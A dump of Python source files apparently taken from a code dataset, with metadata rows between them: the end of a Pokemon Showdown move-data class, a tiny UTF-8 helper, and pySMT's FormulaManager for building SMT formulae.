:rtype: Optional[Dict[str, float]]
"""
return self.entry.get("boosts", None)
@property
def breaks_protect(self) -> bool:
"""
        :return: Whether the move breaks protect-like defenses.
:rtype: bool
"""
return self.entry.get("breaksProtect", False)
@property
def can_z_move(self) -> bool:
"""
        :return: Whether there exists a z-move version of this move.
:rtype: bool
"""
return self.id not in SPECIAL_MOVES
@property
def category(self) -> MoveCategory:
"""
:return: The move category.
:rtype: MoveCategory
"""
return MoveCategory[self.entry["category"].upper()]
@property
def crit_ratio(self) -> int:
"""
:return: The move's crit ratio. If the move is guaranteed to crit, returns 6.
        :rtype: int
"""
if "critRatio" in self.entry:
return int(self.entry["critRatio"])
elif "willCrit" in self.entry:
return 6
return 0
@property
def current_pp(self) -> int:
"""
:return: Remaining PP.
:rtype: int
"""
return self._current_pp
@property
def damage(self) -> Union[int, str]:
"""
        :return: The move's fixed damage. Can be an int or 'level' for moves such as
Seismic Toss.
:rtype: Union[int, str]
"""
return self.entry.get("damage", 0)
@property
def deduced_target(self) -> Optional[str]:
"""
:return: Move deduced target, based on Move.target and showdown's request
messages.
:rtype: str, optional
"""
if self.id in SPECIAL_MOVES:
return self.target
elif self.request_target:
return self.request_target
elif self.target == "randomNormal":
return self.request_target
return self.target
@property
def defensive_category(self) -> MoveCategory:
"""
        :return: The move's defensive category.
:rtype: MoveCategory
"""
if "defensiveCategory" in self.entry:
return MoveCategory[self.entry["defensiveCategory"].upper()]
return self.category
@property
def drain(self) -> float:
"""
        :return: Ratio of the inflicted damage recovered as HP, between 0 and 1.
:rtype: float
"""
if "drain" in self.entry:
return self.entry["drain"][0] / self.entry["drain"][1]
return 0.0
@property
def dynamaxed(self):
"""
:return: The dynamaxed version of the move.
:rtype: DynamaxMove
"""
if self._dynamaxed_move:
return self._dynamaxed_move
self._dynamaxed_move = DynamaxMove(self)
return self._dynamaxed_move
@property
def entry(self) -> dict:
"""
Should not be used directly.
:return: The data entry corresponding to the move
:rtype: dict
"""
if self._id in self._MOVES_DICT:
return self._MOVES_DICT[self._id]
elif self._id.startswith("z") and self._id[1:] in self._MOVES_DICT:
return self._MOVES_DICT[self._id[1:]]
else:
raise ValueError("Unknown move: %s" % self._id)
@property
def expected_hits(self) -> float:
"""
:return: Expected number of hits, between 1 and 5. Equal to n_hits if n_hits is
constant.
:rtype: float
"""
if self._id == "triplekick" or self._id == "tripleaxel":
# Triple Kick and Triple Axel have an accuracy check for each hit, and also
# rise in BP for each hit
return 1 + 2 * 0.9 + 3 * 0.81
min_hits, max_hits = self.n_hit
if min_hits == max_hits:
return min_hits
else:
# It hits 2-5 times
assert min_hits == 2 and max_hits == 5
return (2 + 3) / 3 + (4 + 5) / 6
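    # Illustrative note (not part of the original library): the 2-5 hit branch
    # above encodes a distribution of 2 or 3 hits with probability 1/3 each and
    # 4 or 5 hits with probability 1/6 each, so the expectation works out to
    # (2 + 3) / 3 + (4 + 5) / 6 = 5/3 + 9/6 ~ 3.17 hits per use.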
@property
def flags(self) -> Set[str]:
"""
This property is not well defined, and may be missing some information.
If you need more information on some flag, please open an issue in the project.
:return: Flags associated with this move. These can come from the data or be
custom.
:rtype: Set[str]
"""
flags = set(self.entry["flags"])
flags.update(set(self.entry.keys()).intersection(self._MISC_FLAGS))
return flags
@property
def force_switch(self) -> bool:
"""
:return: Whether this move forces switches.
:rtype: bool
"""
return self.entry.get("forceSwitch", False)
@property
def heal(self) -> float:
"""
:return: Proportion of the user's HP recovered.
:rtype: float
"""
if "heal" in self.entry:
return self.entry["heal"][0] / self.entry["heal"][1]
return 0.0
@property
def id(self) -> str:
"""
:return: Move id.
:rtype: str
"""
return self._id
@property
def ignore_ability(self) -> bool:
"""
:return: Whether the move ignore its target's ability.
:rtype: bool
"""
return self.entry.get("ignoreAbility", False)
@property
def ignore_defensive(self) -> bool:
"""
:return: Whether the opponent's stat boosts are ignored.
:rtype: bool
"""
return self.entry.get("ignoreDefensive", False)
@property
def ignore_evasion(self) -> bool:
"""
        :return: Whether the opponent's evasion is ignored.
:rtype: bool
"""
return self.entry.get("ignoreEvasion", False)
@property
def ignore_immunity(self) -> Union[bool, Set[PokemonType]]:
"""
:return: Whether the opponent's immunity is ignored, or a list of ignored
immunities.
:rtype: bool or set of Types
"""
if "ignoreImmunity" in self.entry:
if isinstance(self.entry["ignoreImmunity"], bool):
return self.entry["ignoreImmunity"]
else:
return {
PokemonType[t.upper().replace("'", "")]
for t in self.entry["ignoreImmunity"].keys()
}
return False
@property
def is_empty(self) -> bool:
"""
:return: Whether the move is an empty move.
:rtype: bool
"""
return self._is_empty
@property
def is_protect_counter(self) -> bool:
"""
        :return: Whether this move increments a mon's protect counter.
        :rtype: bool
"""
return self._id in _PROTECT_COUNTER_MOVES
@property
def is_protect_move(self) -> bool:
"""
        :return: Whether this move is a protect-like move.
        :rtype: bool
"""
return self._id in _PROTECT_MOVES
@property
def is_side_protect_move(self) -> bool:
"""
        :return: Whether this move is a side-protect move.
        :rtype: bool
"""
return self._id in _SIDE_PROTECT_MOVES
@property
def is_z(self) -> bool:
"""
:return: Whether the move is a z move.
:rtype: bool
"""
return Move.is_id_z(self.id)
@property
def max_pp(self) -> int:
"""
:return: The move's max pp.
:rtype: int
"""
return self.entry["pp"]
@property
def n_hit(self) -> Tuple:
"""
:return: How many hits this move lands. Tuple of the form (min, max).
:rtype: Tuple
"""
if "multihit" in self.entry:
if isinstance(self.entry["multihit"], list):
return tuple(self.entry["multihit"])
else:
return self.entry["multihit"], self.entry["multihit"]
return 1, 1
@property
def no_pp_boosts(self) -> bool:
"""
        :return: Whether the move's PP cannot be boosted (noPPBoosts).
:rtype: bool
"""
return "noPPBoosts" in self.entry
@property
def non_ghost_target(self) -> bool:
"""
:return: True for curse.
:rtype: bool
"""
return "nonGhostTarget" in self.entry
@property
def priority(self) -> int:
"""
:return: Move priority.
:rtype: int
"""
return self.entry["priority"]
@property
def pseudo_weather(self) -> str:
"""
:return: Pseudo-weather activated by this move.
:rtype: str
"""
return self.entry.get("pseudoWeather", None)
@property
def recoil(self) -> float:
"""
:return: Proportion of the move's damage inflicted as recoil.
:rtype: float
"""
if "recoil" in self.entry:
return self.entry["recoil"][0] / self.entry["recoil"][1]
elif "struggleRecoil" in self.entry:
return 0.25
return 0.0
@property
def request_target(self) -> Optional[str]:
"""
:return: Target information sent by showdown in a request message, if any.
:rtype: str, optional
"""
return self._request_target
@request_target.setter
def request_target(self, request_target: Optional[str]) -> None:
"""
:param request_target: Target information received from showdown in a request
message.
"type request_target: str, optional
"""
self._request_target = request_target
@staticmethod
@lru_cache(maxsize=4096)
def retrieve_id(move_name: str) -> str:
"""Retrieve the id of a move based on its full name.
:param move_name: The string to convert into a move id.
:type move_name: str
:return: The corresponding move id.
:rtype: str
"""
move_name = to_id_str(move_name)
if move_name.startswith("return"):
return "return"
if move_name.startswith("frustration"):
return "frustration"
return move_name
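    # Illustrative sketch (not part of the original library), assuming to_id_str
    # lowercases the name and strips non-alphanumeric characters:
    #   Move.retrieve_id("Sludge Bomb")   -> "sludgebomb"
    #   Move.retrieve_id("Frustration")   -> "frustration"  (special-cased above)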
@property
def secondary(self) -> List[dict]:
"""
:return: Secondary effects. At this point, the precise content of this property
is not too clear.
:rtype: Optional[Dict]
"""
if "secondary" in self.entry and self.entry["secondary"]:
return [self.entry["secondary"]]
elif "secondaries" in self.entry:
return self.entry["secondaries"]
return []
@property
def self_boost(self) -> Optional[Dict[str, int]]:
"""
:return: Boosts applied to the move's user.
:rtype: Dict[str, int]
"""
if "selfBoost" in self.entry:
return self.entry["selfBoost"].get("boosts", None)
elif "self" in self.entry and "boosts" in self.entry["self"]:
return self.entry["self"]["boosts"]
return None
@property
def self_destruct(self) -> Optional[str]:
"""
:return: Move's self destruct consequences.
:rtype: Optional[str]
"""
return self.entry.get("selfdestruct", None)
@property
def self_switch(self) -> Union[str, bool]:
"""
        :return: What kind of self switch this move implies for the user.
:rtype: Optional[str]
"""
return self.entry.get("selfSwitch", False)
@property
def side_condition(self) -> Optional[str]:
"""
:return: Side condition inflicted by the move.
:rtype: Optional[str]
"""
return self.entry.get("sideCondition", None)
@property
def sleep_usable(self) -> bool:
"""
        :return: Whether the move can be used by a sleeping pokemon.
:rtype: bool
"""
return self.entry.get("sleepUsable", False)
@property
def slot_condition(self) -> Optional[str]:
"""
:return: Which slot condition is started by this move.
:rtype: Optional[str]
"""
return self.entry.get("slotCondition", None)
@property
def stalling_move(self) -> bool:
"""
:return: Showdown classification of the move as a stalling move.
:rtype: bool
"""
return self.entry.get("stallingMove", False)
@property
def status(self) -> Optional[Status]:
"""
:return: The status inflicted by the move.
:rtype: Optional[Status]
"""
if "status" in self.entry:
return Status[self.entry["status"].upper()]
return None
@property
def steals_boosts(self) -> bool:
"""
:return: Whether the move steals its target's boosts.
:rtype: bool
"""
return self.entry.get("stealsBoosts", False)
@property
def target(self) -> str:
"""
:return: Move target. Possible targets (copied from PS codebase):
* adjacentAlly - Only relevant to Doubles or Triples, the move only
targets an ally of the user.
* adjacentAllyOrSelf - The move can target the user or its ally.
* adjacentFoe - The move can target a foe, but not (in Triples)
a distant foe.
* all - The move targets the field or all Pokémon at once.
* allAdjacent - The move is a spread move that also hits the user's ally.
* allAdjacentFoes - The move is a spread move.
* allies - The move affects all active Pokémon on the user's team.
* allySide - The move adds a side condition on the user's side.
* allyTeam - The move affects all unfainted Pokémon on the user's team.
* any - The move can hit any other active Pokémon, not just those adjacent.
* foeSide - The move adds a side condition on the foe's side.
* normal - The move can hit one adjacent Pokémon of your choice.
* randomNormal - The move targets an adjacent foe at random.
* scripted - The move targets the foe that damaged the user.
* self - The move affects the user of the move.
:rtype: str
"""
return self.entry["target"]
@property
def terrain(self) -> Optional[Field]:
"""
:return: Terrain started by the move.
:rtype: Optional[Field]
"""
terrain = self.entry.get("terrain", None)
if terrain is not None:
terrain = Field.from_showdown_message(terrain)
return terrain
@property
def thaws_target(self) -> bool:
"""
:return: Whether the move thaws its target.
:rtype: bool
"""
return self.entry.get("thawsTarget", False)
@property
def type(self) -> PokemonType:
"""
:return: Move type.
:rtype: PokemonType
"""
return PokemonType[self.entry["type"].upper()]
@property
def use_target_offensive(self) -> bool:
"""
:return: Whether the move uses the target's offensive statistics.
:rtype: bool
"""
return self.entry.get("useTargetOffensive", False)
@property
def volatile_status(self) -> Optional[str]:
"""
:return: Volatile status inflicted by the move.
:rtype: Optional[str]
"""
return self.entry.get("volatileStatus", None)
@property
def weather(self) -> Optional[Weather]:
"""
:return: Weather started by the move.
:rtype: Optional[Weather]
"""
if "weather" in self.entry:
return Weather[self.entry["weather"].upper()]
return None
@property
def z_move_boost(self) -> Optional[Dict[str, int]]:
"""
:return: Boosts associated with the z-move version of this move.
:rtype: Dict[str, int]
"""
if "zMove" in self.entry and "boost" in self.entry["zMove"]:
return self.entry["zMove"]["boost"]
return None
@property
def z_move_effect(self) -> Optional[str]:
"""
:return: Effects associated with the z-move version of this move.
:rtype: Optional[str]
"""
if "zMove" in self.entry and "effect" in self.entry["zMove"]:
return self.entry["zMove"]["effect"]
return None
@property
def z_move_power(self) -> int:
"""
:return: Base power of the z-move version of this move.
:rtype: int
"""
if "zMove" in self.entry and "basePower" in self.entry["zMove"]:
return self.entry["zMove"]["basePower"]
elif self.category == MoveCategory.STATUS:
return 0
base_power = self.base_power
if self.n_hit != (1, 1):
base_power *= 3
elif base_power <= 55:
return 100
elif base_power <= 65:
return 120
elif base_power <= 75:
return 140
elif base_power <= 85:
return 160
elif base_power <= 95:
return 175
elif base_power <= 100:
return 180
elif base_power <= 110:
return 185
elif base_power <= 125:
return 190
elif base_power <= 130:
return 195
return 200
class EmptyMove(Move):
def __init__(self, move_id):
self._id: str = move_id
self._is_empty: bool = True
def __getattribute__(self, name):
try:
return super(Move, self).__getattribute__(name)
except (AttributeError, TypeError, ValueError):
return 0
class Gen4Move(Move):
_MOVES_DICT = GEN_TO_MOVES[4]
class Gen5Move(Move):
_MOVES_DICT = GEN_TO_MOVES[5]
class Gen6Move(Move):
_MOVES_DICT = GEN_TO_MOVES[6]
class Gen7Move(Move):
_MOVES_DICT = GEN_TO_MOVES[7]
class Gen8Move(Move):
_MOVES_DICT = GEN_TO_MOVES[8]
GEN_TO_MOVE_CLASS = {4: Gen4Move, 5: Gen5Move, 6: Gen6Move, 7: Gen7Move, 8: Gen8Move}
SPECIAL_MOVES = {"struggle": Move("struggle"), "recharge": EmptyMove("recharge")}
class DynamaxMove(Move):
BOOSTS_MAP = {
PokemonType.BUG: {"spa": -1},
PokemonType.DARK: {"spd": -1},
PokemonType.DRAGON: {"atk": -1},
PokemonType.GHOST: {"def": -1},
PokemonType.NORMAL: {"spe": -1},
}
SELF_BOOSTS_MAP = {
PokemonType.FIGHTING: {"atk": +1},
PokemonType.FLYING: {"spe": +1},
PokemonType.GROUND: {"spd": +1},
PokemonType.POISON: {"spa": +1},
PokemonType.STEEL: {"def": +1},
}
TERRAIN_MAP = {
PokemonType.ELECTRIC: Field.ELECTRIC_TERRAIN,
PokemonType.FAIRY: Field.MISTY_TERRAIN,
PokemonType.GRASS: Field.GRASSY_TERRAIN,
PokemonType.PSYCHIC: Field.PSYCHIC_TERRAIN,
}
WEATHER_MAP = {
PokemonType.FIRE: Weather.SUNNYDAY,
PokemonType.ICE: Weather.HAIL,
PokemonType.ROCK: Weather.SANDSTORM,
PokemonType.WATER: Weather.RAINDANCE,
}
def __init__(self, parent: Move):
self._parent: Move = parent
def __getattr__(self, name):
return getattr(self._parent, name)
@property
def accuracy(self):
return 1
@property
def base_power(self) -> int:
if self.category != MoveCategory.STATUS:
base_power = self._parent.base_power
if self.type in {PokemonType.POISON, PokemonType.FIGHTING}:
if base_power < 40:
return 70
if base_power < 50:
return 75
if base_power < 60:
return 80
if base_power < 70:
return 85
if base_power < 100:
return 90
if base_power < 140:
return 95
return 100
else:
if base_power < 40:
return 90
if base_power < 50:
return 100
if base_power < 60:
return 110
if base_power < 70:
return 120
if base_power < 100:
return 130
if base_power < 140:
return 140
return 150
return 0
@property
def boosts(self) -> Optional[Dict[str, float]]:
if self.category != MoveCategory.STATUS:
return self.BOOSTS_MAP.get(self.type, None)
return None
@property
def breaks_protect(self):
return False
@property
def crit_ratio(self):
return 0
@property
def damage(self):
return 0
@property
def defensive_category(self):
return self.category
@property
def expected_hits(self):
return 1
@property
def force_switch(self):
return False
@property
def heal(self):
return 0
@property
def is_protect_counter(self):
return self.category == MoveCategory.STATUS
@property
def is_protect_move(self):
return self.category == MoveCategory.STATUS
@property
def n_hit(self):
return 1
@property
def priority(self):
return 0
@property
def recoil(self):
return 0
@property
def self_boost(self) -> Optional[Dict[str, float]]:
if self.category != MoveCategory.STATUS:
return self.SELF_BOOSTS_MAP.get(self.type, None)
return None
@property
def status(self):
return None
@property
def terrain(self) -> Optional[Field]:
if self.category != MoveCategory.STATUS:
return self.TERRAIN_MAP.get(self.type, None)
return None
@property
def weather(self) -> Optional[Weather]:
if self.category != MoveCategory.STATUS:
return self.WEATHER_MAP.get(self.type, None)
return None
| 28.151616
| 87
| 0.561896
|
93e752bccc620675c309699f0bc5d503d9c962aa
| 131
|
py
|
Python
|
easylife/utils.py
|
JaniszM/easylife
|
37ce67f9a36de52a8118c1a98e9279c43e2b5061
|
[
"MIT"
] | 1
|
2021-01-01T15:53:49.000Z
|
2021-01-01T15:53:49.000Z
|
easylife/utils.py
|
JaniszM/easylife
|
37ce67f9a36de52a8118c1a98e9279c43e2b5061
|
[
"MIT"
] | null | null | null |
easylife/utils.py
|
JaniszM/easylife
|
37ce67f9a36de52a8118c1a98e9279c43e2b5061
|
[
"MIT"
] | null | null | null |
# coding=utf-8
def convert_to_utf8(value):
if isinstance(value, str):
value = value.encode("utf-8")
return value
| 16.375
| 37
| 0.641221
|
4348a8bcda43a6916174132cfb857845f3c4c712
| 48,560
|
py
|
Python
|
pysmt/formula.py
|
soarlab/pysmt
|
f9a5243657060d120158b68acfd15120979fee42
|
[
"Apache-2.0"
] | 3
|
2021-03-22T00:11:48.000Z
|
2021-04-05T20:09:04.000Z
|
pysmt/formula.py
|
soarlab/pysmt
|
f9a5243657060d120158b68acfd15120979fee42
|
[
"Apache-2.0"
] | 3
|
2020-01-07T05:14:01.000Z
|
2021-03-23T03:24:48.000Z
|
pysmt/formula.py
|
soarlab/pysmt
|
f9a5243657060d120158b68acfd15120979fee42
|
[
"Apache-2.0"
] | 2
|
2019-12-18T18:09:02.000Z
|
2021-03-28T08:57:07.000Z
|
#
# This file is part of pySMT.
#
# Copyright 2014 Andrea Micheli and Marco Gario
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""The FormulaManager is used to create formulae.
All objects are memoized so that two syntactically equivalent formulae
are represented by the same object.
The FormulaManager provides many more constructors than the operators
defined (operators.py). This is because many operators are rewritten,
and therefore are only virtual. Common examples are GE, GT that are
rewritten as LE and LT. Similarly, the operator Xor is rewritten using
its definition.
"""
import sys
if sys.version_info >= (3, 3):
from collections.abc import Iterable
else:
from collections import Iterable
from six.moves import xrange
import pysmt.typing as types
import pysmt.operators as op
from pysmt.fnode import FNode, FNodeContent
from pysmt.exceptions import UndefinedSymbolError, PysmtValueError, PysmtTypeError
from pysmt.walkers.identitydag import IdentityDagWalker
from pysmt.constants import Fraction
from pysmt.constants import (is_pysmt_fraction,
is_pysmt_integer,
is_python_rational,
is_python_integer,
is_python_string,
pysmt_fraction_from_rational,
pysmt_integer_from_integer)
class FormulaManager(object):
"""FormulaManager is responsible for the creation of all formulae."""
def __init__(self, env=None):
self.env = env
# Attributes for handling symbols and formulae
self.formulae = {}
self.symbols = {}
self._fresh_guess = 0
# get_type() from TypeChecker will be initialized lazily
self.get_type = None
self._next_free_id = 1
self.int_constants = {}
self.real_constants = {}
self.string_constants = {}
self.true_formula = self.create_node(node_type=op.BOOL_CONSTANT,
args=tuple(),
payload=True)
self.false_formula = self.create_node(node_type=op.BOOL_CONSTANT,
args=tuple(),
payload=False)
return
def _do_type_check_real(self, formula):
self.get_type(formula)
def _do_type_check(self, formula):
self.get_type = self.env.stc.get_type
self._do_type_check = self._do_type_check_real
return self._do_type_check(formula)
def create_node(self, node_type, args, payload=None):
content = FNodeContent(node_type, args, payload)
if content in self.formulae:
return self.formulae[content]
else:
n = FNode(content, self._next_free_id)
self._next_free_id += 1
self.formulae[content] = n
self._do_type_check(n)
return n
def _create_symbol(self, name, typename=types.BOOL):
if len(name) == 0:
raise PysmtValueError("Empty string is not a valid name")
if not isinstance(typename, types.PySMTType):
raise PysmtValueError("typename must be a PySMTType.")
n = self.create_node(node_type=op.SYMBOL,
args=tuple(),
payload=(name, typename))
self.symbols[name] = n
return n
def new_fresh_symbol(self, typename, base="FV%d"):
count = self._fresh_guess
while (base % count) in self.symbols:
count = count + 1
name = (base % count)
self._fresh_guess = count + 1
v = self.Symbol(name, typename)
assert v is not None
return v
def get_symbol(self, name):
try:
return self.symbols[name]
except KeyError:
raise UndefinedSymbolError(name)
def get_all_symbols(self):
return self.symbols.values()
def get_or_create_symbol(self, name, typename):
s = self.symbols.get(name, None)
if s is None:
return self._create_symbol(name, typename)
if not s.symbol_type() == typename:
raise PysmtTypeError("Trying to redefine symbol '%s' with a new type"
". Previous type was '%s' new type is '%s'" %
(name, s.symbol_type(), typename))
return s
# Node definitions start here
def Symbol(self, name, typename=types.BOOL):
return self.get_or_create_symbol(name, typename)
def FreshSymbol(self, typename=types.BOOL, template=None):
if template is None:
return self.new_fresh_symbol(typename)
return self.new_fresh_symbol(typename, template)
def ForAll(self, variables, formula):
""" Creates an expression of the form:
Forall variables. formula(variables)
Restrictions:
- Formula must be of boolean type
- Variables must be BOOL, REAL or INT
"""
if len(variables) == 0:
return formula
return self.create_node(node_type=op.FORALL,
args=(formula,),
payload=tuple(variables))
def Exists(self, variables, formula):
""" Creates an expression of the form:
Exists variables. formula(variables)
Restrictions:
- Formula must be of boolean type
- Variables must be BOOL, REAL or INT
"""
if len(variables) == 0:
return formula
return self.create_node(node_type=op.EXISTS,
args=(formula,),
payload=tuple(variables))
def Function(self, vname, params):
"""Returns the function application of vname to params.
Note: Applying a 0-arity function returns the function itself.
"""
if len(params) == 0:
return vname
assert len(params) == len(vname.symbol_type().param_types)
return self.create_node(node_type=op.FUNCTION,
args=tuple(params),
payload=vname)
def Not(self, formula):
""" Creates an expression of the form:
not formula
Restriction: Formula must be of boolean type
"""
if formula.is_not():
return formula.arg(0)
return self.create_node(node_type=op.NOT, args=(formula,))
def Implies(self, left, right):
""" Creates an expression of the form:
left -> right
Restriction: Left and Right must be of boolean type
"""
return self.create_node(node_type=op.IMPLIES, args=(left, right))
def Iff(self, left, right):
""" Creates an expression of the form:
left <-> right
Restriction: Left and Right must be of boolean type
"""
return self.create_node(node_type=op.IFF, args=(left, right))
def Minus(self, left, right):
""" Creates an expression of the form:
left - right
Restriction: Left and Right must be both INT or REAL type
"""
return self.create_node(node_type=op.MINUS, args=(left, right))
def Times(self, *args):
""" Creates a multiplication of terms
        This function has polymorphic n-arguments:
- Times(a,b,c)
- Times([a,b,c])
Restriction:
- Arguments must be all of the same type
- Arguments must be INT or REAL
"""
tuple_args = self._polymorph_args_to_tuple(args)
if len(tuple_args) == 0:
raise PysmtTypeError("Cannot create a Times without arguments.")
if len(tuple_args) == 1:
return tuple_args[0]
else:
return self.create_node(node_type=op.TIMES,
args=tuple_args)
def Pow(self, base, exponent):
""" Creates the n-th power of the base.
The exponent must be a constant.
"""
if not exponent.is_constant():
raise PysmtValueError("The exponent of POW must be a constant.", exponent)
if base.is_constant():
val = base.constant_value() ** exponent.constant_value()
if base.is_constant(types.REAL):
return self.Real(val)
else:
assert base.is_constant(types.INT)
return self.Int(val)
return self.create_node(node_type=op.POW, args=(base, exponent))
def Div(self, left, right, reduce_const=True):
""" Creates an expression of the form: left / right """
if reduce_const:
if right.is_constant(types.REAL):
# If right is a constant we rewrite as left * 1/right
inverse = Fraction(1) / right.constant_value()
return self.Times(left, self.Real(inverse))
elif right.is_constant(types.INT):
raise NotImplementedError
# This is a non-linear expression
return self.create_node(node_type=op.DIV,
args=(left, right))
def Equals(self, left, right):
""" Creates an expression of the form: left = right
For the boolean case use Iff
"""
return self.create_node(node_type=op.EQUALS,
args=(left, right))
def NotEquals(self, left, right):
""" Creates an expression of the form: left != right"""
return self.Not(self.Equals(left, right))
def GE(self, left, right):
""" Creates an expression of the form:
left >= right
Restriction: Left and Right must be both REAL or INT type
"""
return self.create_node(node_type=op.LE, args=(right, left))
def GT(self, left, right):
""" Creates an expression of the form:
left > right
Restriction: Left and Right must be both REAL or INT type
"""
return self.create_node(node_type=op.LT, args=(right, left))
def LE(self, left, right):
""" Creates an expression of the form:
left <= right
Restriction: Left and Right must be both REAL or INT type
"""
return self.create_node(node_type=op.LE, args=(left, right))
def LT(self, left, right):
""" Creates an expression of the form:
left < right
Restriction: Left and Right must be both REAL or INT type
"""
return self.create_node(node_type=op.LT, args=(left, right))
def Ite(self, iff, left, right):
""" Creates an expression of the form:
if( iff ) then left else right
Restriction:
- Iff must be BOOL
- Left and Right must be both of the same type
"""
return self.create_node(node_type=op.ITE, args=(iff, left, right))
def Real(self, value):
""" Returns a Real-type constant of the given value.
value can be:
- A Fraction(n,d)
- A tuple (n,d)
- A long or int n
- A float
- (Optionally) a mpq or mpz object
"""
if value in self.real_constants:
return self.real_constants[value]
if is_pysmt_fraction(value):
val = value
elif type(value) == tuple:
val = Fraction(value[0], value[1])
elif is_python_rational(value):
val = pysmt_fraction_from_rational(value)
else:
raise PysmtTypeError("Invalid type in constant. The type was:" + \
str(type(value)))
n = self.create_node(node_type=op.REAL_CONSTANT,
args=tuple(),
payload=val)
self.real_constants[value] = n
return n
def Int(self, value):
"""Return a constant of type INT."""
if value in self.int_constants:
return self.int_constants[value]
if is_pysmt_integer(value):
val = value
elif is_python_integer(value):
val = pysmt_integer_from_integer(value)
else:
raise PysmtTypeError("Invalid type in constant. The type was:" + \
str(type(value)))
n = self.create_node(node_type=op.INT_CONSTANT,
args=tuple(),
payload=val)
self.int_constants[value] = n
return n
def String(self, value):
"""Return a constant of type STRING."""
if value in self.string_constants:
return self.string_constants[value]
if is_python_string(value):
n = self.create_node(node_type=op.STR_CONSTANT,
args=tuple(),
payload=value)
self.string_constants[value] = n
return n
else:
raise TypeError("Invalid type in constant. The type was:" + \
str(type(value)))
def TRUE(self):
"""Return the boolean constant True."""
return self.true_formula
def FALSE(self):
"""Return the boolean constant False."""
return self.false_formula
def Bool(self, value):
if type(value) != bool:
raise PysmtTypeError("Expecting bool, got %s" % type(value))
if value:
return self.true_formula
else:
return self.false_formula
def And(self, *args):
""" Returns a conjunction of terms.
        This function has polymorphic arguments:
- And(a,b,c)
- And([a,b,c])
Restriction: Arguments must be boolean
"""
tuple_args = self._polymorph_args_to_tuple(args)
if len(tuple_args) == 0:
return self.TRUE()
elif len(tuple_args) == 1:
return tuple_args[0]
else:
return self.create_node(node_type=op.AND,
args=tuple_args)
    def Or(self, *args):
        """ Returns a disjunction of terms.
        This function has polymorphic n-arguments:
- Or(a,b,c)
- Or([a,b,c])
Restriction: Arguments must be boolean
"""
tuple_args = self._polymorph_args_to_tuple(args)
if len(tuple_args) == 0:
return self.FALSE()
elif len(tuple_args) == 1:
return tuple_args[0]
else:
return self.create_node(node_type=op.OR,
args=tuple_args)
    def Plus(self, *args):
        """ Returns a sum of terms.
        This function has polymorphic n-arguments:
- Plus(a,b,c)
- Plus([a,b,c])
Restriction:
- Arguments must be all of the same type
- Arguments must be INT or REAL
"""
tuple_args = self._polymorph_args_to_tuple(args)
if len(tuple_args) == 0:
raise PysmtTypeError("Cannot create a Plus without arguments.")
if len(tuple_args) == 1:
return tuple_args[0]
else:
return self.create_node(node_type=op.PLUS,
args=tuple_args)
def ToReal(self, formula):
""" Cast a formula to real type. """
t = self.env.stc.get_type(formula)
if t == types.REAL:
# Ignore casting of a Real
return formula
elif t == types.INT:
if formula.is_int_constant():
return self.Real(formula.constant_value())
return self.create_node(node_type=op.TOREAL,
args=(formula,))
else:
raise PysmtTypeError("Argument is of type %s, but INT was "
"expected!\n" % t)
def RealToInt(self, formula):
""" Cast a real formula to the int
that is no more than the real. """
return self.create_node(node_type=op.REALTOINT,
args=(formula,))
def Ceiling(self, formula):
""" Cast a real formula to the int
that is at least as large as the real. """
int_val = self.RealToInt(formula)
cond = self.Equals(self.ToReal(int_val), formula)
return self.Ite(cond, int_val, self.Plus(int_val, self.Int(1)))
def Truncate(self, formula):
""" Truncate a real formula to int. """
cond = self.GE(formula, self.Real(0))
return self.Ite(cond, self.RealToInt(formula), self.Ceiling(formula))
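    # Illustrative note (not part of the original module): with RealToInt acting
    # as a floor, Ceiling applied to the real 2.5 builds Ite(2 = 2.5, 2, 2 + 1),
    # i.e. 3, while Truncate applied to -2.5 takes the Ceiling branch and yields
    # -2, i.e. rounding toward zero.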
    def AtMostOne(self, *args):
        """ At most one of the bool expressions can be true at any time.
        This uses a quadratic encoding:
A -> !(B \/ C)
B -> !(C)
"""
bool_exprs = self._polymorph_args_to_tuple(args)
constraints = []
for (i, elem) in enumerate(bool_exprs[:-1], start=1):
constraints.append(self.Implies(elem,
self.Not(self.Or(bool_exprs[i:]))))
return self.And(constraints)
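    # Illustrative expansion (not part of the original module): for three Boolean
    # terms A, B, C the quadratic encoding above produces
    #   And(Implies(A, Not(Or(B, C))), Implies(B, Not(C)))
    # which is true exactly when at most one of A, B, C is true.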
def ExactlyOne(self, *args):
""" Encodes an exactly-one constraint on the boolean symbols.
        This uses a quadratic encoding:
A \/ B \/ C
A -> !(B \/ C)
B -> !(C)
"""
args = self._polymorph_args_to_tuple(args)
return self.And(self.Or(*args),
self.AtMostOne(*args))
    def AllDifferent(self, *args):
        """ Encodes the 'all-different' constraint using pairwise
        inequalities.
AllDifferent(x, y, z) := (x != y) & (x != z) & (y != z)
"""
exprs = self._polymorph_args_to_tuple(args)
res = []
for i, a in enumerate(exprs):
for b in exprs[i+1:]:
res.append(self.Not(self.EqualsOrIff(a, b)))
return self.And(res)
def Xor(self, left, right):
"""Returns the xor of left and right: left XOR right """
return self.Not(self.Iff(left, right))
def Min(self, *args):
"""Returns the encoding of the minimum expression within args"""
exprs = self._polymorph_args_to_tuple(args)
assert len(exprs) > 0
if len(exprs) == 1:
return exprs[0]
elif len(exprs) == 2:
a, b = exprs
return self.Ite(self.LE(a, b), a, b)
else:
h = len(exprs) // 2
return self.Min(self.Min(exprs[0:h]), self.Min(exprs[h:]))
def Max(self, *args):
"""Returns the encoding of the maximum expression within args"""
exprs = self._polymorph_args_to_tuple(args)
assert len(exprs) > 0
if len(exprs) == 1:
return exprs[0]
elif len(exprs) == 2:
a, b = exprs
return self.Ite(self.LE(a, b), b, a)
else:
h = len(exprs) // 2
return self.Max(self.Max(exprs[0:h]), self.Max(exprs[h:]))
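    # Illustrative note (not part of the original module): Min and Max recurse by
    # halving the argument list, e.g. Min(a, b, c) unfolds to
    #   Ite(a <= Ite(b <= c, b, c), a, Ite(b <= c, b, c))
    # a tree of nested Ite terms whose repeated subterm is shared by memoization.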
def EqualsOrIff(self, left, right):
"""Returns Equals() or Iff() depending on the type of the arguments.
This can be used to deal with ambiguous cases where we might be
dealing with both Theory and Boolean atoms.
"""
type_ = self.env.stc.get_type(left)
if type_.is_bool_type():
return self.Iff(left, right)
else:
return self.Equals(left, right)
